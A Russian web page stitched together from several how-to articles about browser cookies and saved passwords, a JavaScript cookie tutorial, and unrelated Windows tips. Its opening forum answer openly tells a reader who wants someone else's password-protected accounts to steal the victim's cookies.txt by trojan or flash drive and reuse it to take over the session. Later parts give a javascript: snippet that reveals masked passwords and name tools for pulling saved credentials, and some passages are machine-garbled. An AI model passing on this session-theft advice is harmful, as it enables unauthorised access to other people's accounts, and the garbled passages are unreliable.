На вопрос Как достать КУКИ cokies. Нужны куки как достать подскажите плиз!!! 1 заданный автором Влад eeEEeeeeeeeeee лучший ответ это Что такое cookies?
Дело в том, что в процессе развития www-технологий и внедрения языков программирования в Интернет, перед разработчиками программ возникла очень серьезная проблема - как сохранять результаты выполнения алгоритма для каждого конкретно взятого пользователя на долгое время? Сам по себе протокол HTTP не имеет возможности фиксирования результатов программных процессов. Использование сессий также не является решением проблемы, так как их действие прекращается сразу после разрыва соединения с сервером.
Проблема разрешилась с внедрением механизма cookies (то есть, в переводе с английского, - "печенье"). Cookies обладают замечательным свойством - они сохраняются на винчестере пользователя и могут храниться там практически неограниченное время.
По своей сути cookies - это обычные текстовые файлы, хранящиеся в специальной директории, используемой броузером (обычно эта папка называется Temporary Internet Files), и вы можете увидеть их, зайдя в эту директорию (быстрый доступ к ней для броузера IE осуществляется через пункты меню Сервис -> Свойства обозревателя -> Временные файлы Интернета -> Настройка -> Просмотр
Одни значения cookie могут храниться только в течение одной сессии, они удаляются после закрытия броузера. Другие, установленные на некоторый период времени, записываются в файл. В общем случае этот файл называется "cookies.txt" (но их может быть несколько) и лежит в рабочей директории установленного на компьютер браузера.
иными словами
Cookie - это небольшая порция текстовой информации, которую сервер передает браузеру. Сами по себе cookies не могут делать ничего, но когда пользователь обращается к серверу (набирает его адрес в строке браузера) , сервер может считывать информацию, содержащуюся в cookies, и на основании ее анализа совершать какие-либо действия. Например, в случае авторизованного доступа к чему-либо через веб, в cookies сохраняется логин и пароль в течение сессии, что позволяет пользователю не вводить их снова при запросах каждого документа, защищенного паролем.
Если ты пытаешься получить доступ через эту тему к чужим запароленным аккаунтам, то тебе надо найти способ дистанционно (троян) или внаглую скопировав на флешь если имеешь доступ к тому компу где работает жертва скопировать это файл cookies.txt и заменить в своём (таком же) браузере свой на него. Далее заходишь на нужный сайт где интересующий тебя аккаунт, и автоматически получаешь доступ. Но учти, если жертва нажимает выход из аккаунта (например из почты) при окончании работы - то в кукисах будет стёрта инфа о сессии и ты никакого доступа не получишь.
Mozilla Firefox хранит куки в профиле пользователя, в файле C:Documents and SettingsИмя пользователяApplication DataMozillaFirefoxProfilescookies.txt
nternet Explorer сохраняет данные cookies в виде отдельных текстовых файлов в папке C:Documents and SettingsИмя пользователяCookies
Опера хранит куки в файле C:Documents and SettingsИмя пользователяApplication DataOperaOperaprofilecookies4.dat

Opera раскройте главное меню, перейдите в секцию «Настройки» и выберите строку «Общие настройки...». А можете просто нажать горячие клавиши CTRL + F12. Так вы откроете окно настроек браузера, где на вкладке «Расширенные» нужно щелкнуть раздел «Cookies» в левой панели. В нем вам нужно щелкнуть кнопку «Управление Cookies».

В Mozilla FireFox откройте в меню раздел «Инструменты» и выберите пункт «Настройки». В окне настроек вам надо перейти на вкладку «Приватность», найти там кнопку с надписью «Показать Cookies…» и щелкнуть ее для доступа к списку хранимых браузером кук. Здесь их можно искать и просматривать.

В обозревателе Internet Explorer раскройте раздел «Сервис» в меню и выберите пункт «Свойства ». В окне настройки свойств перейдите на вкладку «Общие» и щелкните кнопку «Параметры» в секции «История просмотра». Таким способом вы откроете еще одно окно («Параметры временных файлов»), в котором надо нажать кнопку «Показать файлы».

Щелкните заголовок «Имя» в открывшемся списке содержимого папки хранения временных файлов Internet Explorer - таким способом вы сможете сгруппировать все файлы кук в один блок в общей куче разнородных файлов. Здесь можно найти интересующий файл и открыть его в стандартном Блокноте для просмотра или редактирования.

В Google Chrome щелкните в верхнем правом углу окна иконку с изображением гаечного ключа и выберите строку «Параметры» в меню. Браузер откроет страницу «Настройки», а вы кликните ссылку «Расширенные» в ее левой панели и на странице расширенных настроек щелкните кнопку «Настройки содержания». Это еще не последняя страница на пути к кукам, хранимым этим браузером.

Нажмите кнопку «Все файлы cookie и данные сайтов» на следующей странице и вы, наконец, получите доступ к списку кук.

В Google Chrome предусмотрены возможности поиска, просмотра и удаления кук.

В браузере Safari щелкните иконку с изображением шестеренки в правом верхнем углу и выберите строку «Настройки…». В окне изменения установок вам нужно перейти на закладку «Безопасность», чтобы нажать там кнопку «Показать Cookies». В Safari предусмотрены только функции поиска и удаления кук, содержимое этих временных файлов здесь можно увидеть только частично.

Файлы Cookies необходимы пользователю не только для больше стремительной загрузки непрерывно посещаемых страниц. Ту либо другую информацию удаленные сервера самосильно сберегают на компьютер пользователя, дабы в будущем было комфортно трудиться с обменом данными.

Инструкция

1. Дабы узнать логин и пароль пользователя на источниках, дозволено применять файлы. Если вы пользуетесь браузером Mozilla Firefox, а в нем включена опция записи cookies, можете прямо в программе узнать сохраненные логины и пароли. Нажмите для этого вверху страницы в меню браузера пункт под наименованием «Инструменты». Выберите настройку системы. Перед вами появится огромное окно, содержащее несколько вкладок. Перейдите на вкладку «Охрана».

2. В появившемся окне нажмите на кнопку с надписью «Сохраненные пароли». Перед вами возникнет новое окно с перечнем логинов, которые сохранялись вами на разных источниках. Кликните по кнопке «Отобразить пароли». Еще вы можете защитить данную информацию, предпочтя установку пароля в этом же меню.

3. Если вы пользуетесь браузером Opera, то сумеете узнать лишь имена пользователей. Откройте для этого администратор паролей в инструментах и посмотрите имеющиеся логины. Дабы узнать сохраненный пароль, установите дополнительное программное обеспечение, к примеру, Opera Password Recovery. При этом помните, что никакое стороннее программное обеспечение не гарантирует вам полную сохранность личных данных, именно следственно запоминайте пароли независимо либо пользуйтесь иным браузером.

4. Вы хотите посмотреть пароль в Google Chrome? Тогда откройте настройки в параметрах, кликнув по соответствующему пункту на панели инструментов. Перейдите в раздел «расширенные» и нажмите на «Показать файлы cookie».

5. Если вы являетесь пользователем стандартного браузера Internet Explorer, воспользуйтесь примитивный утилитой BehindTheAsterisks, дабы вытянуть пароль. Она является бесплатной программой, которая владеет интуитивным интерфейсом и обеспечивает пользователю опцию отображения пароля символами, а не звездочками. Данная утилита доступна и для других браузеров.

Во многих современных браузерах существует такая функция, как запоминание паролей для разных сайтов. Введя пароль один раз, вы освобождаете себя от необходимости заполнять строку при всяком входе на сайт. Но что делать, если вы позабыли пароль, а на сайте он спрятан за точечками? Для того дабы узнать пароль, вы обязаны следовать дальнейшим инструкциям.

Инструкция

1. Для начала вам нужно зайти на сайт, пароль от которого вам надобен. Нажмите на «Жезл паролей». Позже того как все поля будут заполнены звездочками либо точками, сразу же нажимайте ESC. После этого в строку адреса введите дальнейший код:javascript:(function () { inp = document.getElementsByTagName(‘input’); for (var j = 0; j < inp.length; j++) { if (inp[j].type == ‘password’) { prompt(inp[j].name, inp[j].value); } } }) ()Нажав на ENTER, вы получите нужный пароль.

2. Если 1-й метод не помог, вы можете воспользоваться утилитой Opera password Recovery. Это программа, которая предуготовлена для поправления паролей, сохраненных в браузере Opera. Данная программа дюже примитивна и комфортна в применении, вам необходимо каждого лишь запустить ее, а после этого нажать на «Поправление паролей». Все обнаруженные пароли будут сохранены в текстовых файлах либо в отчетах HTML.

Весь из современных браузеров имеет опцию чистки временных файлов, включая куки . Но изредка бывает необходима не тотальная зачистка, а выборочный просмотр, редактирование и удаление хранимых браузером кук. Ниже приведено изложение доступа к такой опции в особенно знаменитых браузерах.

Инструкция

1. В браузере Opera для доступа ко каждым хранимым им кукам нужно в «Основном меню» перейти в раздел «Настройки» и предпочесть там пункт «Всеобщие настройки…» (либо нажать сочетание клавиш CTRL + F12). В итоге откроется окно настроек браузера, в котором вам нужно перейти на вкладку «Расширенные», предпочесть на левой панели раздел «Cookies» и щелкнуть кнопку «Управление Cookies».

2. В Opera в окне управления куками вы можете обнаружить вам надобное, выделить и, нажав кнопку «Изменить» увидеть содержимое записи. При желании можете отредактировать куку.

3. В Mozilla FireFox, дабы добраться до кук, нужно предпочесть в меню раздел «Инструменты», а в нем щелкнуть пункт «Настройки». В окне настроек перейдите на вкладку «Приватность» и нажмите кнопку с надписью «Показать Cookies…». В итоге откроется окно со списком сохраненных кук, в котором есть вероятность искать и просматривать их содержимое.

4. В обозревателе Internet Explorer путь к хранилищу кук лежит через раздел меню с наименованием «Сервис» и пункт «Свойства обозревателя» в нем. Щелчок по этому пункту открывает окно, в котором вам нужно на вкладке «Всеобщие» нажать ту из кнопок «Параметры», которая помещена в разделе «История просмотра». Позже этого откроется следующее окно с заголовком «Параметры временных файлов» где надобно щелкнуть кнопку с надписью «Показать файлы».

5. Таким методом в Internet Explorer вы попадете в папку хранения всех временных файлов. Если щелкните заголовок колонки «Имя», то файлы рассортируются по наименованию и все файлы кук сгруппируются в один блок. Вы можете обнаружить надобный и открыть для просмотра и редактирования в обыкновенном текстовом редакторе.

6. Браузер Google Chrome имеет самую длинную последовательность действий для приобретения доступа к кукам. Вначале вам следует в правом верхнем углу окна щелкнуть иконку с изображением гаечного ключа и предпочесть в меню пункт «Параметры». Это откроет страницу «Настройки», в левой панели которой вам нужно щелкнуть ссылку «Расширенные». На странице расширенных настроек нажмите кнопку «Настройки оглавления», дабы открыть новое окно.

7. В новом окне вам необходимо щелкнуть кнопку «Все файлы cookie и данные сайтов». Это будет конечный пункт в переходе к кукам, сохраненным браузером.

8. В Google Chrome вы сумеете просматривать и удалять куки .

9. В браузере Safari для доступа к кукам вам тоже нужно щелкнуть иконку в верхнем правом углу – ту из них, на которой изображена шестеренка. В меню выберите пункт «Настройки…», что откроет новое окно. В нем вам нужно перейти на вкладку «Безопасность» и нажать кнопку «Показать Cookies». В Safari вы имеете вероятность только искать и удалять куки .

Видео по теме

Современные программы-браузеры помнят за нас все: наши любимые странички, все, что посещалось нами на протяжении долгого времени, пароли ко всевозможным сайтам – почте, играм, общественным сетям. Как чай комфортно зайти на сайт и теснее не думать о вступлении логина и пароля! Но доводится изредка переустанавливать систему и все пароли из памяти программ возвращать в свою.

Вам понадобится

• – компьютер с доступом в интернет
• – браузер

Инструкция

1. Запустите программу Mozilla Firefox, и, дабы восстановить пароль , сохраненный в данном браузере, исполните команду “Инструменты”. Выберите пункт меню «Настройки», перейдите во вкладку «Охрана», нажмите кнопку «Сохраненные пароли». В этом окне просмотрите все пароли, сохраненные в браузере, выделите необходимый и нажмите «показать».

2. Скачайте программу, которая дозволит показать сохраненные пароли в программе Опера – UnWand – Программа для просмотра паролей (Wand – Жезл) в Opera, а также Opera password recovery 3.5.1.225 Обнаружить ее не составит труда. Установите программу на свой компьютер, запустите программу. Выберите необходимую опцию поправления паролей: механически из жезла, механически из почты, вручную из жезла, вручную из почты, смешанный вариант. Нажмите кнопку «Дальше». Появится окно сканирования, в дальнейшем окне нужно указать местонахождение программы опера, и нажать дальше. Программа просканирует данную папку и выведет на экран сохраненные пароли.

3. Скачайте программу, которая сумеет показать пароли в браузере, не только в Опере, либо Мозилле, но и многих других браузерах – Multi Password Recovery. Для скачивания перейдите на формальный сайт программы – http://passrecovery.com/ru/index.php. Скачайте и установите на свой компьютер эту программу. При установке программа предложит проверить обновление, нажмите «ОК». Запустите программу из основного меню. Слева будет отображено меню, в котором нужно предпочесть необходимую программу, дабы восстановить пароль . К примеру, браузер Internet Explorer, выберите его из списка, и в правой части окна программы будут показаны сохраненные в этом браузере пароли.

4. Дабы восстановить пароль из браузера с подмогой иной программы, перейдите на сайт http://www.nirsoft.net/, выберите и скачайте всякую программу оттуда. Их функции аналогичны предыдущим описанным программам.

Примерно неизменно для соблюдения приватности при вводе паролей соответствующие программы взамен вводимых знаков отображают нечитаемые символы – «звездочки». Впрочем если вы видите в поле ввода пароля эти самые звездочки, это еще не обозначает, что в это поле подлинно размещен пароль . Нередко такие звездочки ничего не скрывают, а носят чисто информационную функцию – дать вам осознать, что при вводе пароль будет спрятан от сторонних глаз.

Инструкция

1. Откажитесь от намерения расшифровать звездочки в веб-страницах, полученных с сервера. В безусловном большинстве случаев пароли не передаются сервером в браузер пользователя. В этом дозволено удостовериться, открыв полученный вашим веб-обозревателем начальный код страницы – в нем не будет пароля ни в открытом виде, ни в зашифрованном. Через интернет пароли передаются только в одном направлении – из браузера на сервер.

2. Воспользуйтесь какой-нибудь специализированной прикладной программой, которая может читать пароли в открытых окнах других программ. В составе служебных компонентов операционной системы таких средств нет. Было бы необычно, если бы программа дешифрации была бы в одном комплекте с программами, обеспечивающими безопасность паролей. Надобную программу несложно обнаружить в интернете – скажем, это может быть Pass Checker. Программа состоит из шести файлов (включая файл справки) всеобщим весом каждого 296 килобайт и не требует установки. Сразу позже сохранения файлов на грубый диск либо съемный носитель ее дозволено запускать двойным щелчком по файлу Password.exe.

3. Откройте программу, звездочки которой вас волнуют. После этого поместите окно Pass Checker над открытой программой и левой кнопкой мыши перетащите изображение черепа на поле со спрятанным звездочками паролем. Это поле будет подсвечено мигающей рамкой, а в окне Pass Checker наоборот надписи window text дешифратор разместит пароль в его незашифрованном виде. Данный пароль дозволено скопировать и применять необходимым вам образом.

4. Щелкните кнопку Help в нижнем ряду кнопок, если хотите применять больше трудные методы расшифровки паролей. Помимо особенно простого, описанного в предыдущем шаге, программа предусматривает еще два варианта. Невзирая на англоязычный интерфейс, справка Pass Checker написана на русском языке, следственно загвоздок с переводом не будет.

Видео по теме

Процедура извлечения нечаянно перемещенных файлов из карантина подавляющего большинства антивирусных программ, больше либо менее, стандартизирована и отличается только деталями. В данном случае рассматривается операция поправления размещенных в карантин файлов приложений Microsoft Security Essentials, Norton и Avast Antivirus.

Вам понадобится

• – Microsoft Security Essentials;
• – avast! Free Antivirus 5.0;
• – Norton Internet Security

Инструкция

1. Запустите приложение Microsoft Security Essentials и перейдите на вкладку «Журнал» в основном окне программы для выполнения операции извлечения фалов из карантина .

2. Укажите пункт «Элементы, размещенные в карантин» и нажмите кнопку «Просмотреть данные» в открывшемся диалоговом окне.

3. Введите пароль менеджера компьютера в появившемся окне запроса и укажите файл, подлежащий поправлению из карантина , в списке.

4. Нажмите кнопку «Восстановить» для заключения процедуры извлечения файла либо используйте кнопку «Удалить все» для полной чистки карантина антивирусного приложения Microsoft Security Essentials.

5. Выберите пункт меню «Обслуживание» в основном окне антивирусной программы avast! Free Antivirus 5.0 и перейдите на вкладку «Карантин» открывшегося диалогового окна.

6. Вызовите контекстное меню подлежащего поправлению файла в списке правой части окна приложения и укажите команду «Восстановить» для извлечения выбранного файла в изначальное место хранения, указанное в разделе «Начальное расположение».

7. Выберите пункт «Карантин» в окне «Журнал безопасности» антивирусной программы Norton Internet Security и нажмите кнопку Параметры» для выполнения операции поправления файла, размещенного а карантин.

8. Укажите необходимый файл и выберите команду «Восстановить данный файл» в открывшемся окне «Найдена опасность».

9. Нажмите кнопку «Да» в новом диалоговом окне «Поправление из карантина » и закончите операцию поправления нажатием кнопки «Закрыть».

Обратите внимание!
Извлечение файлов из карантина допускается только в случае безусловной уверенности в их безвредности!

Полезный совет
Следует помнить, что «Карантин» – это специальная папка, сделанная антивирусным приложением. Файлы, размещенные в карантин, всецело изолированы от операционной системы и недостижимы для внешних процессов. Они не могут быть запущены, что и обеспечивает безопасность их хранения.

Операционная система Windows имеет типовой механизм внедрения произвольных данных в динамические библиотеки и исполняемые модули, а также API для работы с ними. Изображения, таблицы строк, образцы диалогов, панелей инструментов, меню и иная информация добавляется в PE-модули в виде источников. Изредка в разных целях требуется вытянуть источники из скомпилированного модуля.

Вам понадобится

• – бесплатная программа Resource Hacker, доступная для загрузки на странице rpi.net.au/~ajohnson/resourcehacker.

Инструкция

1. Загрузите файл PE-модуля в Resource Hacker. В основном меню приложения ступенчато кликните по пунктам File и Open либо нажмите сочетание клавиш Ctrl+O на клавиатуре. Будет отображен диалог открытия файла. Совершите переход в директорию, где находится целевой файл. Выделите PE-модуль в листинге каталога. Нажмите кнопку «Открыть».

2. Определите перечень источников, которые нужно вытянуть. Позже загрузки PE-файла в левой части основного окна Resource Hacker будет отображена древовидная конструкция. Она представляет собой список всех источников модуля с группировкой по типам. Так, скажем, источники диалогов размещаются в разделе Dialog, источники курсоров - в разделах Cursor и Cursor Group, иконки - в разделах Icon и Icon Group.Узлы второго яруса иерархии, содержащиеся в всем разделе, представляют собой числовые либо символические идентификаторы источников. Разворачивайте их и выделяйте вложенные элементы. При этом будут визуализированы соответствующие источники. Иконки, курсоры, растры отобразятся в виде изображений в правой панели основного окна приложения. Для таблиц строк, акселераторов, информации о версии, образцов диалогов, меню, инструментальных панелей будет построен и отображен код в формате, пригодном для применения с компилятором RCC. Помимо того, образцы диалогов визуализируются в отдельном плавающем окне.

3. Начните процесс сохранения обнаруженных на предыдущем шаге источников. Выделите надобный элемент в древовидной структуре слева. Откройте раздел Action основного меню приложения. Выберите пункт, соответствующий операции сохранения особенно подходящего типа.Выберите пункт “Save resource as a binary file …”, если нужно сберечь источник в виде фрагмента бинарных данных, одинакового тому, что содержится в PE-модуле.Выберите “Save resource as a *.res file …” для приобретения файла, содержащего скомпилированную версию выделенного источника. Сходственный файл пригоден для линковки с приложением либо библиотекой.Кликните по пункту с текстом вида “Save [Имя раздела: имя подраздела: имя ресурса] …” для того дабы вытянуть источники в их начальном виде. Данным пунктом меню стоит пользоваться для извлечения файлов иконок, курсоров и изображений.

4. Вытянете источники. В диалоге с заголовком “Save resource to…” задайте имя и директорию сберегаемого файла. Нажмите кнопку «Сберечь».

Изредка в операционной системе Windows с окном какой-нибудь программы случается странность – в свернутом и развернутом на каждый экран состоянии его поведение типично, а в окне средних размеров приложение пропадает за рубежом видимой области экрана. Методы достать скатившееся с рабочего стола окно существуют, и они не так уж трудны.

Вам понадобится

• ОС Windows.

Инструкция

1. 1-й метод извлечения объекта из заметной области заключается в том, дабы передоверить все ручные операции по его позиционированию самой операционной системе. Для этого откройте помимо проблемного окна еще правда бы одно, принадлежащее любому приложению – скажем, запустите «Проводник». После этого кликните правой кнопкой мыши по свободному пространству на панели задач, дабы вызвать контекстное меню. Дайте ОС команду систематизировать открытые окна одним из перечисленных в меню методов – «Окна каскадом», «Отображать окна стопкой» либо «Отображать окна рядом». Позже этого поведение затерянного окна вернется к норме.

2. Иной метод заключается в применении клавиатурного управления позиционированием окна. Позже его включения отпадет надобность дотягиваться указателем мышки до заголовка окна, дабы получить вероятность его переместить. Для включения этого режима нажмите сочетание «жгучих клавиш» Alt + «Пробел» + «П». После этого с поддержкой клавиш со стрелками переместите спрятанное окно на видимую область рабочего стола. Дабы отключить режим клавиатурного позиционирования, кликните в любом месте левой кнопкой мыши.

3. 3-й метод – растяжение доступного пространства рабочего стола. Сделать это дозволено увеличением разрешения экрана. Если вы используете последние версии ОС Windows 7 либо Vista, кликните фоновую картинку на рабочем столе правой кнопкой мыши и выберите во всплывшем контекстном меню пункт, тот, что так и назван – «Разрешение экрана». ОС запустит один из апплетов «Панели управления», где вам надобно раскрыть выпадающий список «Разрешение» и переместить ползунок вверх, отменнее – до самой верхней отметки. Позже этого нажмите кнопку «Применить». Апплет изменит разрешение и запустит таймер, по окончании отсчета которого это метаморфоза будет отменено. За отведенное время вам необходимо нажать кнопку подтверждения операции. Сделав это, обнаружьте пропавшее окно, переместите его к центру рабочего стола и верните разрешение экрана к бывшему значению.

Среди информации в файлах cookies неоднократно востребованы идентификационные данные пользователей. Узнайте логин и пароль на интернет-источниках, которые сберегают конфиденциальные данные о своих посетителях.

Вам понадобится

• – ПК под управлением операционной системы Windows;
• – доступ в интернет;
• – веб-браузеры: Mozilla Firefox, Opera, Internet Explorer, Google Chrome;
• – программа Opera Password Recovery;
• – утилита BehindTheAsterisks.

Инструкция

1. Если вы используете для просмотра веб-страниц браузер Mozilla Firefox с активированной в настройках функцией записи cookies, узнайте ваши сохраненные логины и пароли непринужденно в программном обеспечении. Запустите интернет-обозреватель, откройте пункт «Инструменты» и перейдите в настройки системы. В появившемся окне, содержащем несколько вкладок, активируйте параметр «Охрана».

2. Нажмите на кнопку «Сохраненные пароли » в появившемся разделе и перейдите на новую страницу веб-браузера. Она имеет идентификационные символы, которые сохранились в памяти компьютера при посещении вами разных интернет-источников. Кликните по строке «Отобразить пароли ». Вы можете защитить свою конфиденциальную информацию и установить кодовое слово в этом же меню обозревателя.

3. Узнайте имена пользователей, если вы посещаете источники глобальной сети с подмогой знаменитого браузера Opera. Откройте пункт меню «Инструменты» в верхней части веб-обозревателя, используйте администратор паролей и просмотрите список логинов пользователей.

4. Установите дополнительное программное обеспечения для доступа к сохраненным паролям, предпочтя для этой цели утилиту Opera Password Recovery. Помните, что сторонняя программа не гарантирует полную сохранность ваших личных данных.

5. Просматривая пароли в обозревателе Google Chrome, откройте соответствующий параметр на панели инструментов браузера. Войдите в расширенные настройки и активируйте пункт «Показать файлы cookie».

6. Воспользуйтесь многофункциональной бесплатной утилитой с подсознательно доступным интерфейсом BehindTheAsterisks и обнаружьте пароли в куках стандартного браузера Internet Explorer. Перейдите в опциях программы на отображение кодовых слов символами взамен звездочек и получите доступ к паролям.

Кукисы – файлы, которые хранятся на ПК пользователя и содержат в себе информацию о сайтах, когда-либо им посещенных. С поддержкой куков дозволено узнать о том, какие страницы посетил пользователь.

Кукисы – это файлы с информацией о когда-либо посещенных сайтах, которые хранятся в компьютере пользователя. Т. е. когда пользователь заходит на какой-либо веб-источник, информация о нем записывается в кукисы и при дальнейшем посещении данного сайта передается веб-серверу.

Для чего нужны

В кукисах содержится самая различная информация, скажем, пароли аккаунтов на сайтах, цвет образца, размер шрифта, которые пользователь произвел для сайта и т. п. Ярчайший пример как дозволено применять кукисы для сохранения настроек приводит поисковик Google. Эта машина предоставляет вероятность настроить свою поисковую выдачу, речь идет о числе итогов на странице, формате выдаваемых страниц, языке интерфейса и других настройках. Что касается паролей от аккаунтов на сайтах, то всякий пользователь не раз примечал, что однажды указав свой логин и пароль на каком-нибудь веб-источнике, при повторной авторизации он этого теснее не делал, т. к. данная информация о сайте механически записалась в кукисы. При повторном посещении источника данные отправляются веб-серверу, тот, что механически распознает пользователя, освобождая его от необходимости заполнять поля снова. Также кукисы могут сгодиться и для ведения статистики. Никакой опасности для компьютера кукисы представлять не могут. Это каждого лишь текстовые данные, неспособные нанести ему урон. С поддержкой куков невозможно удалить, передать либо считать информацию с ПК пользователя, впрочем узнать о том, какие страницы он посетил, дозволено. Современные браузеры теснее предоставляют пользователю вероятность выбора: сберегать куки либо нет, но если он предпочтет службу отключения сохранения кукисов, он должен быть готов к загвоздкам в работе с некоторыми сайтами.

Недостатки кукисов

Во-первых, куки не неизменно имеют вероятность верно идентифицировать пользователя. Во-вторых, их может украсть преступник. Что касается неправильного распознавания, то поводом этому может быть применение пользователем нескольких браузеров. Чай у всякого браузера имеется свое хранилище, следственно кукисы идентифицируют не пользователя, а его браузер и ПК, и если у него есть несколько браузеров, то будет и несколько комплектов куков. Злоумышленников может привлечь непрерывный обмен куками между браузером пользователя и веб-сервером, чай если сетевой трафик не шифруется, дозволено с подмогой особых программ-снифферов прочесть куки-пользователя. Эту задачу дозволено решить путем шифрования трафика и применения разных протоколов.

Видео по теме

JavaScript дает возможность устанавливать и читать куки в браузере. В данном уроке мы рассмотрим как происходит работа с куками, а также сделаем простую страницу, которая будет помнить введеное имя и отображать его при каждом входе.

Что такое куки (cookie)?

Куки - это небольшой объем данных, которые хранятся вэб браузером. Они позволяют Вам сохранять определенную информацию о пользователе и получать ее каждый раз, когда он посещает Вашу страницу. Каждый пользователь имеет свой собственный уникальный набор куков.

Обычно куки используются веб сервером для выполнения таких функций как отслеживание посещений сайта, регистрации на сайте и сохранения сведений о заказах или покупках. Однако нам не нужно придумывать программу для вэб сервера чтобы использовать куки. Мы можем использовать их с помощью JavaScript.

Свойство document.cookie .

В JavaScript куки доступны с помощью свойства cookie объекта document. Создать куки можно следующим образом:

И получить весь сохраненый набор куков так:

Var x = document.cookie;

Давайте рассмотрим сохранение и получение куков более подробно.

Сохранение куки

Для сохранения куки нужно присвоить document.cookie текстовую строку, которая содержит свойства куки, которые мы хотим создать:

document.cookie = " name = значение; expires= дата; path= путь; domain= домен; secure";

Свойства описаны в таблице:

Свойство Описание Пример

name = значение	Устанавливает имя куки и его значение.	username=Вася
expires= дата	Устанавливает дату истечения срока хранения куки. Дата должна быть представлена в формате, который возвращает метод toGMTString() объекта Date . Если значение expires не задано, куки будет удалено при закрытии браузера.	expires= 13/06/2003 00:00:00
path= путь	Данная опция устанавливает путь на сайте, в рамках которого действует куки. Получить значение куки могут только документы из указанного пути. Обычно данное свойство оставляют пустым, что означает что только документ установивший куки может получит доступ к нему.	path=/demo/
domain= домен	Данная опция устанавливает домен, в рамках которого действует куки. Получить значение куки могут только сайты из указанного домена. Обычно данное свойство оставляют пустым, что означает, что только домен установивший куки может получит доступ к нему.	domain=сайт
secure	Данная опция указывает браузеру, что для пересылки куки на сервер следует использовать SSL. Очень редко используется.	secure

Давайте посмотрим пример установки куки:

document.cookie = "username=Вася; expires=15/02/2011 00:00:00";

Данный код устанавливает куки username , и присваивает ему значение "Вася" , которое будет храниться до 15-го февраля 2011 года (используется Европейский формат времени!).

var cookie_date = new Date (2003, 01, 15); document.cookie = "username=Вася; expires=" + cookie_date.toGMTString();

Данный код выполняет точно такое же действие, как и предыдущий пример, но для установки даты используется метод Date.toGMTString() . Учтите, что нумерация месяца в объекте Date начинается с 0, то есть февраль - это 01 .

Document.cookie = "logged_in=yes";

Данный код устанавливает куки logged_in , и присваивает ему значение "yes" . Так как атрибут expires не установлен, то куки удалится при закрытии браузера.

var cookie_date = new Date (); // Текущая дата и время cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "logged_in=; expires=" + cookie_date.toGMTString();

Данный код устанавливает куки logged_in и присваивает строку хранения значение времени за одну секунду перед текущим - такая операция приведет к немедленному удалению куки. Ручной способ удалить куки!

Перекодирование значения куки!

Следует перекодировать значение куки для корректного хранения и отображения таких символов как пробел и двоеточие. Такая операция гарантирует, что браузер корректно воспримет значение. Перекодирование лекго выполняется функцией JavaScript escape() . Например:

document.cookie = "username=" + escape("Вася Пупкин") + "; expires=15/02/2003 00:00:00"; Функция для установки куки

Установка куки станет проще, если мы напишем специальную функцию, которая будет выполнять простые операции, такие как перекодирование значений и построение строки document.cookie . Например:

Function set_cookie (name, value, exp_y, exp_m, exp_d, path, domain, secure) { var cookie_string = name + "=" + escape (value); if (exp_y) { var expires = new Date (exp_y, exp_m, exp_d); cookie_string += "; expires=" + expires.toGMTString(); } if (path) cookie_string += "; path=" + escape (path); if (domain) cookie_string += "; domain=" + escape (domain); if (secure) cookie_string += "; secure"; document.cookie = cookie_string; }

Функция получает данные для куки в качестве аргументов, затем строит соответствующую строку и устанавливает куки.

Например, установка куки без срока хранения:

set_cookie ("username", "Вася Пупкин"); set_cookie ("username", "Вася Пупкин", 2011, 01, 15);

Установка куки со сроком хранения, доменом сайт , использованием SSL, но без пути:

set_cookie ("username", "Вася Пупкин", 2003, 01, 15, "", "сайт", "secure"); Функция для удаления куки.

Другая полезная функция для работы с куки представлена ниже. Функция "удаляет" куки из браузера посредством установки срока хранения на одну секунду раньше текущего значения времени.

function delete_cookie (cookie_name) { var cookie_date = new Date (); // Текущая дата и время cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = cookie_name += "=; expires=" + cookie_date.toGMTString(); }

Для использования данной функции нужно только передать ей имя удаляемого куки:

Delete_cookie ("username");

Получение значения куки

Для того, чтобы получить значение предварительно установленного куки для текущего документа, нужно использовать свойство document.cookie:

Var x = document.cookie;

Таким образом возвращается строка, которая состоит из списка пар имя/значение, разделенных точкой с запятой для всех куки, которые действуют для текущего документа. Например:

"username=Вася; password=abc123"

В данном примере 2 куки, которые были предварительно установлены: username , который имеет значение "Вася" , и password , который имеет значение "abc123" .

Функция для получения значения куки

Обычно, нам нужно только значение одного куки за один раз. Поэтому строка куки не удобна для использования! Здесь приводится функция, которая обрабатывает строку document.cookies , возвращет только то куки, которое представляет интерес в конкретный момент:

Function get_cookie (cookie_name) { var results = document.cookie.match ("(^|;) ?" + cookie_name + "=([^;]*)(;|$)"); if (results) return (unescape (results)); else return null; }

Данная функция использует регулярное выражение для поиска имени куки, которое представляет интерес, а затем возвращает значение, которое обработано функцией unescape() для перекодирования к нормальному символьному виду. (Если куки не найдено, возвращается значение null.)

Данная функция проста в использовании. Например, для возврата значения куки username:

Var x = get_cookie ("username");

Простой пример использования

В данном примере мы сделали страницу, которая запрашивает Ваше имя при первом посещении, затем она сохраняет Ваше имя в куки и показывает его при следующих посещениях.

Откройте страницу в новом окне. При первом посещении она попросит ввести имя и сохранит его в куки. Если Вы посетите страницу еще раз, она отобразит на экране введенное имя из куки.

Для куки задаем срок хранения в 1 год от текущей даты, это означает, что браузер сохранит Ваше имя даже если Вы закроете его.

Вы можете посмотреть код страницы в браузере, выбрав функцию просмотра исходного кода. Здесь приводится основная часть кода:

if (! get_cookie ("username")) { var username = prompt ("Пожалуйста, введите Ваше имя", ""); if (username) { var current_date = new Date; var cookie_year = current_date.getFullYear () + 1; var cookie_month = current_date.getMonth (); var cookie_day = current_date.getDate (); set_cookie ("username", username, cookie_year, cookie_month, cookie_day); } } else { var username = get_cookie ("username"); document.write ("Привет, " + username + ", добро пожаловать на страницу!"); document.write ("
Forget about me!"); }

Данный урок показал Вам, как использовать куки в JavaScript для хранения информации о Ваших посетителях. Спасибо за внимание! :)

Что такое же cookie?

Существует механизм, позволяющий http-серверу сохранять на компьютере пользователя некоторую текстовую информацию, а потом к ней обращаться. Данная информация называется cookie. По сути, каждая cookie - это пара: название параметра и его значение. Также каждой cookie присваивается домен, к которому она относится. В целях безопасности во всех браузерах http-серверу позволено лишь обращаться к cookie своего домена. Дополнительно cookie может иметь дату истечения, тогда они будут хранится на компьютере до этой даты, даже если закрыть все окна браузера.

Почему cookie важны?

Во всех многопользовательских системах cookie используются для идентификации пользователя. Вернее, текущего соединения пользователя с сервисом, пользовательской сессии. Если кто-то узнает Ваши cookie, то сможет зайти в систему от Вашего имени. Потому, что в настоящий момент очень мало интернет-ресурсов проверяет смену IP-адреса в течении одной пользовательской сессии.

